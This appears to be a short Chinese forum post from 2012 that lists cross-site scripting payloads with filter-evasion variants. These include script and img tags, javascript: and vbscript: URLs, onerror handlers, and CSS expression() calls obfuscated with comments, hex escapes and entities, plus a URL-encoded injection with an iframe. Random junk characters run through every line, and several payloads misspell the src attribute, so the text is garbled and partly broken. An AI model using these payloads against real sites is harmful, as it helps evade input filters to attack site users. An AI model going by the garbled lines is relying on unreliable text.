<script>alert("跨站")</script> (最常用)6 I' G' g; |0 Y+ U' s: \9 E
<img scr=javascript:alert("跨站")></img>2 }: l/ J9 y4 z {/ R( B' u
<img scr="javascript: alert(/跨站/)></img>
/ t/ ~$ s9 l# J6 `/ n<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: b1 u4 N" D$ r+ H<img scr="#" onerror=alert(/跨站/)></img>
) ~0 r. T0 M9 x/ o( I1 w' L<img scr="#" style="xss:expression(alert(/xss/));"></img>. l' ?4 n5 d4 ?' r9 q0 j$ `( H" x
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
' \6 [: I: a7 N5 w; F<img src=vbscript:msgbox ("xss")></img>, a' h; r& n0 n1 s+ f
<style> input {left:expression (alert('xss'))}</style>
# }* N4 J/ a# G<div style={left:expression (alert('xss'))}></div> g; \* Q& r' s- k6 U5 l! m4 p' K
<div style={left:exp/* */ression (alert('xss'))}></div>4 P; _" g# n/ L; @1 e L3 G
<div style={left:\0065\0078ression (alert('xss'))}></div>
6 z* l7 R) v, Phtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div># a% [2 ~% r5 @) B$ s2 g
unicode <div style="{left:expRessioN (alert('xss'))}">
. [( m1 m! i( j. J( H6 b. k
1 Z r$ j# M* y3 L"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["0 X% G$ A9 b1 ^/ D1 v f7 y8 j
|
发表于 2012-9-15 14:09:13
收藏
支持
反对